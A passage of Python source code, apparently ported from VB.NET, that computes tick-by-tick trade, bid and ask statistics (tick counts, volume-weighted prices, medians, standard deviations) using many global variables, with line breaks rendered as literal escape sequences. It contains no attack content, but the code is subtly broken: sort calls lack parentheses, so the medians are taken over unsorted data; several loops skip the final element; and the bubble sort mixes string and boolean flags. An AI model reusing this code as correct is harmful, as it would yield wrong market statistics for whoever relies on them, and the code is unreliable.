TradeUpProbability + (TradePrice / AskBidMidPrice)\r\n TradeUpPrice.append((TradePrice))\r\n TradeUpVolume.append((TradeVolume))\r\n\r\n Up = True\r\n else:\r\n # 'TradePriceCalculationDownTick ''(, TradePrice, TradeVolume)\r\n TradeDownProbability = TradeDownProbability + (AskBidMidPrice / TradePrice)\r\n TradeDownPrice.append((TradePrice))\r\n TradeDownVolume.append((TradeVolume))\r\n\r\n Up = False\r\n ##End Region\r\n TradeCurrentPrice = TradePrice\r\n TradeFrequency = TradeFrequency + 1\r\n\r\n if TradeMinPrice > TradeCurrentPrice or TradeMinPrice == 0:\r\n TradeMinPrice = TradeCurrentPrice\r\n if TradeMaxPrice < TradeCurrentPrice or TradeMaxPrice == 0:\r\n TradeMaxPrice = TradeCurrentPrice\r\n if TradeSize >= 0:\r\n\r\n if TradeCurrentSize > 0:\r\n if TradeVolume > TradeCurrentSize:\r\n TradeTickVolume = TradeTickVolume + 1\r\n elif TradeVolume < TradeCurrentSize:\r\n TradeTickVolume = TradeTickVolume - 1\r\n ##End Region\r\n TradeCurrentSize = TradeVolume\r\n # Total Value and Total Price will reinitialize by 0 after Interval change\r\n TradeTotalValue = TradeTotalValue + TradeCurrentPrice * TradeCurrentSize\r\n TradeTotalSize = TradeTotalSize + TradeCurrentSize\r\n TradeTotalPrice = TradeTotalPrice + TradeCurrentPrice\r\n # TradePriceVolumeWeighted WILL CALCULATE AFTER ENTERVAL END\r\n if TradeTotalSize > 0:\r\n TradePriceVolumeWeighted = TradeTotalValue / TradeTotalSize\r\n if TradeTotalPrice > 0:\r\n TradeVolumePriceWeighted = TradeTotalValue / TradeTotalPrice\r\n if TradeMinVolume > TradeCurrentSize or TradeMinVolume == 0:\r\n TradeMinVolume = TradeCurrentSize\r\n # 'TradeMinVolume = computeLow(TradeCurrentSize, TradeMinVolume)\r\n # 'TradeMaxVolume = computeHigh(TradeCurrentSize, TradeMaxVolume)\r\n if TradeMaxVolume < TradeCurrentSize or TradeMaxVolume == 0:\r\n TradeMaxVolume = TradeCurrentSize\r\n if TradeFrequency > 0:\r\n ValuePerTrade = TradeTotalValue / TradeFrequency\r\n else:\r\n ValuePerTrade = 0\r\n\r\n\r\ndef BidCalculation():\r\n global BidPrice\r\n global BidSize\r\n global BidCurrentPrice\r\n global BidTickPrice\r\n global AskBidMidPrice\r\n global BidUpProbability\r\n global BidUpPrice\r\n global BidUpVolume\r\n global BidDownProbability\r\n global BidDownPrice\r\n global BidDownVolume\r\n global BidFrequency\r\n global BidMinPrice\r\n global BidMaxPrice\r\n global BidTickVolume\r\n global BidCurrentSize\r\n global BidTotalValue\r\n global BidTotalSize\r\n global BidTotalPrice\r\n global BidPriceVolumeWeighted\r\n global BidVolumePriceWeighted\r\n global BidMinVolume\r\n global BidMaxVolume\r\n global ValuePerBid\r\n Up = True\r\n\r\n if BidSize > 0:\r\n BidVolume = BidSize\r\n if BidPrice > 0:\r\n BidPrice = BidPrice\r\n # 'AskBidMidPrice = (AskCurrentPrice + BidCurrentPrice) / 2\r\n # ''#region \"BidTickPrice\"\r\n if BidCurrentPrice >= 0:\r\n if BidPrice > BidCurrentPrice:\r\n BidTickPrice = BidTickPrice + 1\r\n # 'BidPriceCalculationUpTick ''//beacause of Mean and Deviation\r\n BidUpPrice.append((BidPrice))\r\n BidUpVolume.append((BidVolume))\r\n Up = True\r\n elif BidPrice < BidCurrentPrice:\r\n BidTickPrice = BidTickPrice - 1\r\n # 'BidPriceCalculationDownTick ''(, BidPrice, BidVolume)\r\n BidDownPrice.append((BidPrice))\r\n BidDownVolume.append((BidVolume))\r\n Up = False\r\n elif Up == True:\r\n # 'BidPriceCalculationUpTick ''(, BidPrice, BidVolume)\r\n BidUpPrice.append((BidPrice))\r\n BidUpVolume.append((BidVolume))\r\n Up = True\r\n else:\r\n # 'BidPriceCalculationDownTick ''(, BidPrice, BidVolume)\r\n BidDownPrice.append((BidPrice))\r\n BidDownVolume.append((BidVolume))\r\n Up = False\r\n ##End Region\r\n BidCurrentPrice = BidPrice\r\n BidFrequency = BidFrequency + 1\r\n BidMinPrice = computeLow(BidCurrentPrice, BidMinPrice)\r\n BidMaxPrice = computeHigh(BidCurrentPrice, BidMaxPrice)\r\n if BidSize >= 0:\r\n # ..SplittedValues[3] = Convert.ToString(Convert.ToDouble(..SplittedValues[3]) / EnumerationAndConstant.ValueScalarForVolume)\r\n # ''#region \"TdadeTickVolume\"\r\n if BidCurrentSize > 0:\r\n if BidVolume > BidCurrentSize:\r\n BidTickVolume = BidTickVolume + 1\r\n elif BidVolume < BidCurrentSize:\r\n BidTickVolume = BidTickVolume - 1\r\n ##End Region\r\n BidCurrentSize = BidVolume\r\n # Total Value and Total Price will reinitialize by 0 after Interval change\r\n BidTotalValue = BidTotalValue + (BidCurrentPrice * BidCurrentSize)\r\n BidTotalSize = BidTotalSize + BidCurrentSize\r\n BidTotalPrice = BidTotalPrice + BidCurrentPrice\r\n # BidPriceVolumeWeighted WILL CALCULATE AFTER ENTERVAL END\r\n if BidTotalSize > 0:\r\n BidPriceVolumeWeighted = BidTotalValue / BidTotalSize\r\n if BidTotalPrice > 0:\r\n BidVolumePriceWeighted = BidTotalValue / BidTotalPrice\r\n BidMinVolume = computeLow(BidCurrentSize, BidMinVolume)\r\n BidMaxVolume = computeHigh(BidCurrentSize, BidMaxVolume)\r\n if BidFrequency > 0:\r\n ValuePerBid = BidTotalValue / BidFrequency\r\n else:\r\n ValuePerBid = 0\r\n\r\n\r\ndef AskCalculation():\r\n global AskPrice\r\n global AskSize\r\n global AskCurrentPrice\r\n global AskTickPrice\r\n global AskAskMidPrice\r\n global AskUpProbability\r\n global AskUpPrice\r\n global AskUpVolume\r\n global AskDownProbability\r\n global AskDownPrice\r\n global AskDownVolume\r\n global AskFrequency\r\n global AskMinPrice\r\n global AskMaxPrice\r\n global AskTickVolume\r\n global AskCurrentSize\r\n global AskTotalValue\r\n global AskTotalSize\r\n global AskTotalPrice\r\n global AskPriceVolumeWeighted\r\n global AskVolumePriceWeighted\r\n global AskMinVolume\r\n global AskMaxVolume\r\n global ValuePerAsk\r\n Up = True\r\n\r\n if AskSize > 0:\r\n AskVolume = AskSize\r\n if AskPrice > 0:\r\n AskPrice = AskPrice\r\n # 'AskAskMidPrice = (AskCurrentPrice + AskCurrentPrice) / 2\r\n # ''#region \"AskTickPrice\"\r\n if AskCurrentPrice >= 0:\r\n if AskPrice > AskCurrentPrice:\r\n AskTickPrice = AskTickPrice + 1\r\n # 'AskPriceCalculationUpTick ''//beacause of Mean and Deviation\r\n AskUpPrice.append((AskPrice))\r\n AskUpVolume.append((AskVolume))\r\n Up = True\r\n elif AskPrice < AskCurrentPrice:\r\n AskTickPrice = AskTickPrice - 1\r\n # 'AskPriceCalculationDownTick ''(, AskPrice, AskVolume)\r\n AskDownPrice.append((AskPrice))\r\n AskDownVolume.append((AskVolume))\r\n Up = False\r\n elif Up == True:\r\n # 'AskPriceCalculationUpTick ''(, AskPrice, AskVolume)\r\n AskUpPrice.append((AskPrice))\r\n AskUpVolume.append((AskVolume))\r\n Up = True\r\n else:\r\n # 'AskPriceCalculationDownTick ''(, AskPrice, AskVolume)\r\n AskDownPrice.append((AskPrice))\r\n AskDownVolume.append((AskVolume))\r\n Up = False\r\n ##End Region\r\n AskCurrentPrice = AskPrice\r\n AskFrequency = AskFrequency + 1\r\n AskMinPrice = computeLow(AskCurrentPrice, AskMinPrice)\r\n AskMaxPrice = computeHigh(AskCurrentPrice, AskMaxPrice)\r\n if AskSize >= 0:\r\n # ..SplittedValues[3] = Convert.ToString(Convert.ToDouble(..SplittedValues[3]) / EnumerationAndConstant.ValueScalarForVolume)\r\n # ''#region \"TdadeTickVolume\"\r\n if AskCurrentSize > 0:\r\n if AskVolume > AskCurrentSize:\r\n AskTickVolume = AskTickVolume + 1\r\n elif AskVolume < AskCurrentSize:\r\n AskTickVolume = AskTickVolume - 1\r\n ##End Region\r\n AskCurrentSize = AskVolume\r\n # Total Value and Total Price will reinitialize by 0 after Interval change\r\n AskTotalValue = AskTotalValue + (AskCurrentPrice * AskCurrentSize)\r\n AskTotalSize = AskTotalSize + AskCurrentSize\r\n AskTotalPrice = AskTotalPrice + AskCurrentPrice\r\n # AskPriceVolumeWeighted WILL CALCULATE AFTER ENTERVAL END\r\n if AskTotalSize > 0:\r\n AskPriceVolumeWeighted = AskTotalValue / AskTotalSize\r\n if AskTotalPrice > 0:\r\n AskVolumePriceWeighted = AskTotalValue / AskTotalPrice\r\n AskMinVolume = computeLow(AskCurrentSize, AskMinVolume)\r\n AskMaxVolume = computeHigh(AskCurrentSize, AskMaxVolume)\r\n if AskFrequency > 0:\r\n ValuePerAsk = AskTotalValue / AskFrequency\r\n else:\r\n ValuePerAsk = 0\r\n\r\n ##TRADE Up & Down Calculation Starts\r\n\r\n\r\ndef BubbleSort(TempArray):\r\n NoExchanges = 'True'\r\n # Loop until no more \"exchanges\" are made.\r\n while NoExchanges == 'True':\r\n # Loop through each element in the array.\r\n for i in range(1, len(TempArray) - 1):\r\n # If the element is greater than the element\r\n # following it, exchange the two elements.\r\n if TempArray[i] > TempArray[i + 1]:\r\n NoExchanges = False\r\n Temp = TempArray[i]\r\n TempArray[i] = TempArray[i + 1]\r\n TempArray[i + 1] = Temp\r\n if not (not (NoExchanges)):\r\n break\r\n return TempArray\r\n\r\n\r\ndef CalculateStandardDeviation(Data_Series):\r\n Total_numbers = len(Data_Series)\r\n Total_Variance = 0\r\n if Total_numbers == 0:\r\n Standard_Deviation = 0\r\n else:\r\n # Array.Sort(Data_Series);\r\n Med = CalculationForMedian(Data_Series)\r\n for i in range(0, Total_numbers - 1):\r\n Total_Variance = Total_Variance + ((Data_Series[i] - Med) * (Data_Series[i] - Med))\r\n Standard_Deviation = (math.sqrt((Total_Variance / Total_numbers)))\r\n return Standard_Deviation\r\n\r\n\r\ndef CalculationForMedian(Data_Series):\r\n Length = len(Data_Series)\r\n # print(Length)\r\n # global Median\r\n Series = [0 for y in range(Length)]\r\n # 'ReDim Series(10000)\r\n for i in range(0, Length - 1):\r\n Series[i] = Data_Series[i]\r\n # Series = BubbleSort(Series)\r\n Series.sort\r\n # print('series', Series)\r\n mod2 = math.fmod(Length, 2)\r\n if Length == 0: Med = 0\r\n if Length == 1: Med = Series[0]\r\n len2 = int(Length / 2)\r\n len2m1 = int(len2 - 1)\r\n if mod2 == 0:\r\n Med = Series[len2] + Series[len2m1]\r\n Med = Med / 2\r\n if mod2 == 1: Med = Series[len2]\r\n return Med\r\n\r\n\r\ndef TradeUpCalculation():\r\n global TradeOpenPriceUpTick\r\n global TradeClosePriceUpTick\r\n global TradeCloseVolumeUpTick\r\n global TradeUpStdDeviation\r\n global TradeUpProbability\r\n global TradeUpMedian\r\n if len(TradeUpVolume) > 0 and len(TradeUpPrice) > 0:\r\n # 'TradeUpVolume_str = TradeUpVolume.Clone\r\n TotalLength = len(TradeUpVolume)\r\n\r\n TradeUpValue = [0 for x in range(TotalLength)]\r\n\r\n for i in range(0, TotalLength - 1):\r\n TradeUpValue[i] = TradeUpPrice[i] * TradeUpVolume[i]\r\n Median = CalculationForMedian(TradeUpValue)\r\n\r\n # Median=np.median(TradeUpValue)\r\n Deviation = CalculateStandardDeviation(TradeUpValue)\r\n # Deviation=np.std(TradeUpValue)\r\n UpCut = int(((MedianUpCutOff * TotalLength) / 100))\r\n DownCut = int(((MedianDownCutOff * TotalLength) / 100))\r\n\r\n TradeUpValue.sort\r\n TradeOpenPriceUpTick = TradeUpPrice[0]\r\n for i in range(0, TotalLength - 1):\r\n TradePrice = TradeUpPrice[i]\r\n TradeVolume = TradeUpVolume[i]\r\n TradeValue = TradePrice * TradeVolume\r\n for j in range(DownCut, TotalLength - UpCut - 1):\r\n if TradeValue == TradeUpValue[j]:\r\n TradePriceCalculationUpTick()\r\n break\r\n TradeClosePriceUpTick = TradeUpPrice[TotalLength - 1]\r\n TradeCloseVolumeUpTick = TradeUpVolume[TotalLength - 1]\r\n TradeUpStdDeviation = Deviation\r\n TradeUpMedian = Median\r\n if TotalLength > 0:\r\n TradeUpProbability = TradeUpProbability / TotalLength\r\n TradePriceVolumeCalculationUpTick()\r\n else:\r\n SetTradeUpToZeero()\r\n\r\n\r\ndef TradePriceCalculationUpTick():\r\n ##Region \"calculation for Price\"\r\n global TradeOpenPriceUpTick\r\n global TradeClosePriceUpTick\r\n global TradeFrequencyUpTick\r\n global TradeMinPriceUpTick\r\n global TradeMaxPriceUpTick\r\n global TradeTickVolumeUpTick\r\n global TradeVolume\r\n global TradeCloseVolumeUpTick\r\n global TradeMinVolumeUpTick\r\n global TradeMaxVolumeUpTick\r\n global TradeTotalPriceUpTick\r\n global TradeTotalSizeUpTick\r\n global TradeTotalValueUpTick\r\n if TradeOpenPriceUpTick == 0:\r\n TradeOpenPriceUpTick = TradePrice\r\n TradeClosePriceUpTick = TradePrice\r\n TradeFrequencyUpTick = TradeFrequencyUpTick + 1\r\n TradeMinPriceUpTick = computeLow(TradePrice, TradeMinPriceUpTick)\r\n TradeMaxPriceUpTick = computeHigh(TradePrice, TradeMaxPriceUpTick)\r\n\r\n if TradeVolume > TradeCloseVolumeUpTick:\r\n TradeTickVolumeUpTick = TradeTickVolumeUpTick + 1\r\n elif TradeVolume < TradeCloseVolumeUpTick:\r\n TradeTickVolumeUpTick = TradeTickVolumeUpTick - 1\r\n TradeCloseVolumeUpTick = TradeVolume\r\n TradeMinVolumeUpTick = computeLow(TradeVolume, TradeMinVolumeUpTick)\r\n TradeMaxVolumeUpTick = computeHigh(TradeVolume, TradeMaxVolumeUpTick)\r\n TradeTotalPriceUpTick = TradeTotalPriceUpTick + TradePrice\r\n TradeTotalSizeUpTick = TradeTotalSizeUpTick + TradeVolume\r\n TradeTotalValueUpTick = TradeTotalValueUpTick + (TradeClosePriceUpTick * TradeVolume)\r\n\r\n\r\ndef TradePriceVolumeCalculationUpTick():\r\n global TradeTotalSizeUpTick\r\n global TradePriceVolumeWeightedUpTick\r\n global TradeTotalPriceUpTick\r\n global TradeVolumePriceWeightedUpTick\r\n global TradeFrequencyUpTick\r\n global ValuePerTradeUpTick\r\n\r\n if TradeTotalSizeUpTick > 0:\r\n TradePriceVolumeWeightedUpTick = TradeTotalValueUpTick / TradeTotalSizeUpTick\r\n if TradeTotalPriceUpTick > 0:\r\n TradeVolumePriceWeightedUpTick = TradeTotalValueUpTick / TradeTotalPriceUpTick\r\n if TradeFrequencyUpTick > 0:\r\n ValuePerTradeUpTick = TradeTotalValueUpTick / TradeFrequencyUpTick\r\n else:\r\n ValuePerTradeUpTick = 0\r\n\r\n\r\ndef SetTradeUpToZeero():\r\n global TradeTickVolumeUpTick\r\n global TradeCloseVolumeUpTick\r\n global TradeMinVolumeUpTick\r\n global TradeMaxVolumeUpTick\r\n global TradeTotalSizeUpTick\r\n global TradeTotalValueUpTick\r\n global TradeOpenPriceUpTick\r\n global TradeMinPriceUpTick\r\n global TradeMaxPriceUpTick\r\n\r\n TradeTickVolumeUpTick = 0\r\n TradeCloseVolumeUpTick = 0\r\n TradeMinVolumeUpTick = 0\r\n TradeMaxVolumeUpTick = 0\r\n TradeTotalSizeUpTick = 0\r\n TradeTotalValueUpTick = 0\r\n TradeOpenPriceUpTick = TradeClosePriceUpTick\r\n TradeMinPriceUpTick = TradeClosePriceUpTick\r\n TradeMaxPriceUpTick = TradeClosePriceUpTick\r\n\r\n\r\ndef TradeDownCalculation():\r\n global TradeOpenPriceDownTick\r\n global TradeClosePriceDownTick\r\n global TradeCloseVolumeDownTick\r\n global TradeDownStdDeviation\r\n global TradeDownProbability\r\n global TradeDownMedian\r\n if len(TradeDownVolume) > 0 and len(TradeDownPrice) > 0:\r\n # 'TradeDownVolume_str = TradeDownVolume.Clone\r\n TotalLength = len(TradeDownVolume)\r\n\r\n TradeDownValue = [0 for x in range(TotalLength)]\r\n\r\n for i in range(0, TotalLength - 1):\r\n TradeDownValue[i] = TradeDownPrice[i] * TradeDownVolume[i]\r\n Median = CalculationForMedian(TradeDownValue)\r\n # Median=np.median(TradeDownValue)\r\n Deviation = CalculateStandardDeviation(TradeDownValue)\r\n # Deviation=np.std(TradeDownValue)\r\n UpCut = int(((MedianUpCutOff * TotalLength) / 100))\r\n DownCut = int(((MedianDownCutOff * TotalLength) / 100))\r\n\r\n TradeDownValue.sort\r\n TradeOpenPriceDownTick = TradeDownPrice[0]\r\n for i in range(0, TotalLength - 1):\r\n TradePrice = TradeDownPrice[i]\r\n TradeVolume = TradeDownVolume[i]\r\n TradeValue = TradePrice * TradeVolume\r\n for j in range(DownCut, TotalLength - UpCut - 1):\r\n if TradeValue == TradeDownValue[j]:\r\n TradePriceCalculationDownTick()\r\n break\r\n TradeClosePriceDownTick = TradeDownPrice[TotalLength - 1]\r\n TradeCloseVolumeDownTick = TradeDownVolume[TotalLength - 1]\r\n TradeDownStdDeviation = Deviation\r\n TradeDownMedian = Median\r\n if TotalLength > 0:\r\n TradeDownProbability = TradeDownProbability / TotalLength\r\n TradePriceVolumeCalculationDownTick()\r\n else:\r\n SetTradeDownToZeero()\r\n\r\n\r\ndef TradePriceCalculationDownTick():\r\n ##Region \"calculation for Price\"\r\n global TradeOpenPriceDownTick\r\n global TradeClosePriceDownTick\r\n global TradeFrequencyDownTick\r\n global TradeMinPriceDownTick\r\n global TradeMaxPriceDownTick\r\n global TradeTickVolumeDownTick\r\n global TradeVolume\r\n global TradeCloseVolumeDownTick\r\n global TradeMinVolumeDownTick\r\n global TradeMaxVolumeDownTick\r\n global TradeTotalPriceDownTick\r\n global TradeTotalSizeDownTick\r\n global TradeTotalValueDownTick\r\n if TradeOpenPriceDownTick == 0:\r\n TradeOpenPriceDownTick = TradePrice\r\n TradeClosePriceDownTick = TradePrice\r\n TradeFrequencyDownTick = TradeFrequencyDownTick + 1\r\n TradeMinPriceDownTick = computeLow(TradePrice, TradeMinPriceDownTick)\r\n TradeMaxPriceDownTick = computeHigh(TradePrice, TradeMaxPriceDownTick)\r\n\r\n if TradeVolume > TradeCloseVolumeDownTick:\r\n TradeTickVolumeDownTick = TradeTickVolumeDownTick + 1\r\n elif TradeVolume < TradeCloseVolumeDownTick:\r\n TradeTickVolumeDownTick = TradeTickVolumeDownTick - 1\r\n TradeCloseVolumeDownTick = TradeVolume\r\n TradeMinVolumeDownTick = computeLow(TradeVolume, TradeMinVolumeDownTick)\r\n TradeMaxVolumeDownTick = computeHigh(TradeVolume, TradeMaxVolumeDownTick)\r\n TradeTotalPriceDownTick = TradeTotalPriceDownTick + TradePrice\r\n TradeTotalSizeDownTick = TradeTotalSizeDownTick + TradeVolume\r\n TradeTotalValueDownTick = TradeTotalValueDownTick + (TradeClosePriceDownTick * TradeVolume)\r\n\r\n\r\ndef TradePriceVolumeCalculationDownTick():\r\n global TradeTotalSizeDownTick\r\n global TradePriceVolumeWeightedDownTick\r\n global TradeTotalPriceDownTick\r\n global TradeVolumePriceWeightedDownTick\r\n global TradeFrequencyDownTick\r\n global ValuePerTradeDownTick\r\n\r\n if TradeTotalSizeDownTick > 0:\r\n TradePriceVolumeWeightedDownTick = TradeTotalValueDownTick / TradeTotalSizeDownTick\r\n if TradeTotalPriceDownTick > 0:\r\n TradeVolumePriceWeightedDownTick = TradeTotalValueDownTick / TradeTotalPriceDownTick\r\n if TradeFrequencyDownTick > 0:\r\n ValuePerTradeDownTick = TradeTotalValueDownTick / TradeFrequencyDownTick\r\n else:\r\n ValuePerTradeDownTick = 0\r\n\r\n\r\ndef SetTradeDownToZeero():\r\n global TradeTickVolumeDownTick\r\n global TradeCloseVolumeDownTick\r\n global TradeMinVolumeDownTick\r\n global TradeMaxVolumeDownTick\r\n global TradeTotalSizeDownTick\r\n global TradeTotalValueDownTick\r\n global TradeOpenPriceDownTick\r\n global TradeMinPriceDownTick\r\n global TradeMaxPriceDownTick\r\n\r\n TradeTickVolumeDownTick = 0\r\n TradeCloseVolumeDownTick = 0\r\n TradeMinVolumeDownTick = 0\r\n TradeMaxVolumeDownTick = 0\r\n TradeTotalSizeDownTick = 0\r\n TradeTotalValueDownTick = 0\r\n TradeOpenPriceDownTick = TradeClosePriceDownTick\r\n TradeMinPriceDownTick = TradeClosePriceDownTick\r\n TradeMaxPriceDownTick = TradeClosePriceDownTick\r\n\r\n\r\ndef BidUpCalculation():\r\n global BidOpenPriceUpTick\r\n global BidClosePriceUpTick\r\n global BidCloseVolumeUpTick\r\n global BidUpStdDeviation\r\n global BidUpProbability\r\n global BidUpMedian\r\n if len(BidUpVolume) > 0 and len(BidUpPrice) > 0:\r\n # 'BidUpVolume_str = BidUpVolume.Clone\r\n TotalLength = len(BidUpVolume)\r\n\r\n BidUpValue = [0 for x in range(TotalLength)]\r\n\r\n for i in range(0, TotalLength - 1):\r\n BidUpValue[i] = BidUpPrice[i] * BidUpVolume[i]\r\n Median = CalculationForMedian(BidUpValue)\r\n # Median=np.median(BidUpValue)\r\n Deviation = CalculateStandardDeviation(BidUpValue)\r\n # Deviation=np.std(BidUpValue)\r\n UpCut = int(((MedianUpCutOff * TotalLength) / 100))\r\n DownCut = int(((MedianDownCutOff * TotalLength) / 100))\r\n\r\n BidUpValue.sort\r\n BidOpenPriceUpTick = BidUpPrice[0]\r\n for i in range(0, TotalLength - 1):\r\n BidPrice = BidUpPrice[i]\r\n BidVolume = BidUpVolume[i]\r\n BidValue = BidPrice * BidVolume\r\n for j in range(DownCut, TotalLength - UpCut - 1):\r\n if BidValue == BidUpValue[j]:\r\n BidPriceCalculationUpTick()\r\n break\r\n BidClosePriceUpTick = BidUpPrice[TotalLength - 1]\r\n BidCloseVolumeUpTick = BidUpVolume[TotalLength - 1]\r\n BidUpStdDeviation = Deviation\r\n BidUpMedian = Median\r\n if TotalLength > 0:\r\n BidUpProbability = BidUpProbability / TotalLength\r\n BidPriceVolumeCalculationUpTick()\r\n else:\r\n SetBidUpToZeero()\r\n\r\n\r\ndef BidPriceCalculationUpTick():\r\n ##Region \"calculation for Price\"\r\n global BidOpenPriceUpTick\r\n global BidClosePriceUpTick\r\n global BidFrequencyUpTick\r\n global BidMinPriceUpTick\r\n global BidMaxPriceUpTick\r\n global BidTickVolumeUpTick\r\n global BidVolume\r\n global BidCloseVolumeUpTick\r\n global BidMinVolumeUpTick\r\n global BidMaxVolumeUpTick\r\n global BidTotalPriceUpTick\r\n global BidTotalSizeUpTick\r\n global BidTotalValueUpTick\r\n if BidOpenPriceUpTick == 0:\r\n BidOpenPriceUpTick = BidPrice\r\n BidClosePriceUpTick = BidPrice\r\n BidFrequencyUpTick = BidFrequencyUpTick + 1\r\n BidMinPriceUpTick = computeLow(BidPrice, BidMinPriceUpTick)\r\n BidMaxPriceUpTick = computeHigh(BidPrice, BidMaxPriceUpTick)\r\n\r\n if BidVolume > BidCloseVolumeUpTick:\r\n BidTickVolumeUpTick = BidTickVolumeUpTick + 1\r\n elif BidVolume < BidCloseVolumeUpTick:\r\n BidTickVolumeUpTick = BidTickVolumeUpTick - 1\r\n BidCloseVolumeUpTick = BidVolume\r\n BidMinVolumeUpTick = computeLow(BidVolume, BidMinVolumeUpTick)\r\n BidMaxVolumeUpTick = computeHigh(BidVolume, BidMaxVolumeUpTick)\r\n BidTotalPriceUpTick = BidTotalPriceUpTick + BidPrice\r\n BidTotalSizeUpTick = BidTotalSizeUpTick + BidVolume\r\n BidTotalValueUpTick = BidTotalValueUpTick + (BidClosePriceUpTick * BidVolume)\r\n\r\n\r\ndef BidPriceVolumeCalculationUpTick():\r\n global BidTotalSizeUpTick\r\n global BidPriceVolumeWeightedUpTick\r\n global BidTotalPriceUpTick\r\n global BidVolumePriceWeightedUpTick\r\n global BidFrequencyUpTick\r\n global ValuePerBidUpTick\r\n\r\n if BidTotalSizeUpTick > 0:\r\n BidPriceVolumeWeightedUpTick = BidTotalValueUpTick / BidTotalSizeUpTick\r\n if BidTotalPriceUpTick > 0:\r\n BidVolumePriceWeightedUpTick = BidTotalValueUpTick / BidTotalPriceUpTick\r\n if BidFrequencyUpTick > 0:\r\n ValuePerBidUpTick = BidTotalValueUpTick / BidFrequencyUpTick\r\n else:\r\n ValuePerBidUpTick = 0\r\n\r\n\r\ndef SetBidUpToZeero():\r\n global BidTickVolumeUpTick\r\n global BidCloseVolumeUpTick\r\n global BidMinVolumeUpTick\r\n global BidMaxVolumeUpTick\r\n global BidTotalSizeUpTick\r\n global BidTotalValueUpTick\r\n global BidOpenPriceUpTick\r\n global BidMinPriceUpTick\r\n global BidMaxPriceUpTick\r\n\r\n BidTickVolumeUpTick = 0\r\n BidCloseVolumeUpTick = 0\r\n BidMinVolumeUpTick = 0\r\n BidMaxVolumeUpTick = 0\r\n BidTotalSizeUpTick = 0\r\n BidTotalValueUpTick = 0\r\n BidOpenPriceUpTick = BidClosePriceUpTick\r\n BidMinPriceUpTick = BidClosePriceUpTick\r\n BidMaxPriceUpTick = BidClosePriceUpTick\r\n\r\n\r\ndef BidDownCalculation():\r\n global BidOpenPriceDownTick\r\n global BidClosePriceDownTick\r\n global BidCloseVolumeDownTick\r\n global BidDownStdDeviation\r\n global BidDownProbability\r\n global BidDownMedian\r\n if len(BidDownVolume) > 0 and len(BidDownPrice) > 0:\r\n # 'BidDownVolume_str = BidDownVolume.Clone\r\n TotalLength = len(BidDownVolume)\r\n\r\n BidDownValue = [0 for x in range(TotalLength)]\r\n\r\n for i in range(0, TotalLength - 1):\r\n BidDownValue[i] = BidDownPrice[i] * BidDownVolume[i]\r\n Median = CalculationForMedian(BidDownValue)\r\n # Median=np.median(BidDownValue)\r\n Deviation = CalculateStandardDeviation(BidDownValue)\r\n # Deviation=np.std(BidDownValue)\r\n UpCut = int(((MedianUpCutOff * TotalLength) / 100))\r\n DownCut = int(((MedianDownCutOff * TotalLength) / 100))\r\n\r\n BidDownValue.sort\r\n BidOpenPriceDownTick = BidDownPrice[0]\r\n for i in range(0, TotalLength - 1):\r\n BidPrice = BidDownPrice[i]\r\n BidVolume = BidDownVolume[i]\r\n BidValue = BidPrice * BidVolume\r\n for j in range(DownCut, TotalLength - UpCut - 1):\r\n if BidValue == BidDownValue[j]:\r\n BidPriceCalculationDownTick()\r\n break\r\n BidClosePriceDownTick = BidDownPrice[TotalLength - 1]\r\n BidCloseVolumeDownTick = BidDownVolume[TotalLength - 1]\r\n BidDownStdDeviation = Deviation\r\n BidDownMedian = Median\r\n if TotalLength > 0:\r\n BidDownProbability = BidDownProbability / TotalLength\r\n BidPriceVolumeCalculationDownTick()\r\n else:\r\n SetBidDownToZeero()\r\n\r\n\r\ndef BidPriceCalculationDownTick():\r\n ##Region \"calculation for Price\"\r\n global BidOpenPriceDownTick\r\n global BidClosePriceDownTick\r\n global BidFrequencyDownTick\r\n global BidMinPriceDownTick\r\n global BidMaxPriceDownTick\r\n global BidTickVolumeDownTick\r\n global BidVolume\r\n global BidCloseVolumeDownTick\r\n global BidMinVolumeDownTick\r\n global BidMaxVolumeDownTick\r\n global BidTotalPriceDownTick\r\n global BidTotalSizeDownTick\r\n global BidTotalValueDownTick\r\n if BidOpenPriceDownTick == 0:\r\n BidOpenPriceDownTick = BidPrice\r\n BidClosePriceDownTick = BidPrice\r\n BidFrequencyDownTick = BidFrequencyDownTick + 1\r\n BidMinPriceDownTick = computeLow(BidPrice, BidMinPriceDownTick)\r\n BidMaxPriceDownTick = computeHigh(BidPrice, BidMaxPriceDownTick)\r\n\r\n if BidVolume > BidCloseVolumeDownTick:\r\n BidTickVolumeDownTick = BidTickVolumeDownTick + 1\r\n elif BidVolume < BidCloseVolumeDownTick:\r\n BidTickVolumeDownTick = BidTickVolumeDownTick - 1\r\n BidCloseVolumeDownTick = BidVolume\r\n BidMinVolumeDownTick = computeLow(BidVolume, BidMinVolumeDownTick)\r\n BidMaxVolumeDownTick = computeHigh(BidVolume, BidMaxVolumeDownTick)\r\n BidTotalPriceDownTick = BidTotalPriceDownTick + BidPrice\r\n BidTotalSizeDownTick = BidTotalSizeDownTick + BidVolume\r\n BidTotalValueDownTick = BidTotalValueDownTick + (BidClosePriceDownTick * BidVolume)\r\n\r\n\r\ndef BidPriceVolumeCalculationDownTick():\r\n global BidTotalSizeDownTick\r\n global BidPriceVolumeWeightedDownTick\r\n global BidTotalPriceDownTick\r\n global BidVolumePriceWeightedDownTick\r\n global BidFrequencyDownTick\r\n global ValuePerBidDownTick\r\n\r\n if BidTotalSizeDownTick > 0:\r\n BidPriceVolumeWeightedDownTick = BidTotalValueDownTick / BidTotalSizeDownTick\r\n if BidTotalPriceDownTick > 0:\r\n BidVolumePriceWeightedDownTick = BidTotalValueDownTick / BidTotalPriceDownTick\r\n if BidFrequencyDownTick > 0:\r\n ValuePerBidDownTick = BidTotalValueDownTick / BidFrequencyDownTick\r\n else:\r\n ValuePerBidDownTick = 0\r\n\r\n\r\ndef SetBidDownToZeero():\r\n global BidTickVolumeDownTick\r\n global BidCloseVolumeDownTick\r\n global BidMinVolumeDownTick\r\n global BidMaxVolumeDownTick\r\n global BidTotalSizeDownTick\r\n global BidTotalValueDownTick\r\n global BidOpenPriceDownTick\r\n global BidMinPriceDownTick\r\n global BidMaxPriceDownTick\r\n\r\n BidTickVolumeDownTick = 0\r\n BidCloseVolumeDownTick = 0\r\n BidMinVolumeDownTick = 0\r\n BidMaxVolumeDownTick = 0\r\n BidTotalSizeDownTick = 0\r\n BidTotalValueDownTick = 0\r\n BidOpenPriceDownTick = BidClosePriceDownTick\r\n BidMinPriceDownTick = BidClosePriceDownTick\r\n BidMaxPriceDownTick = BidClosePriceDownTick\r\n\r\n\r\n##Ask Up & Down Calculation Starts\r\n\r\ndef AskUpCalculation():\r\n global AskOpenPriceUpTick\r\n global AskClosePriceUpTick\r\n global 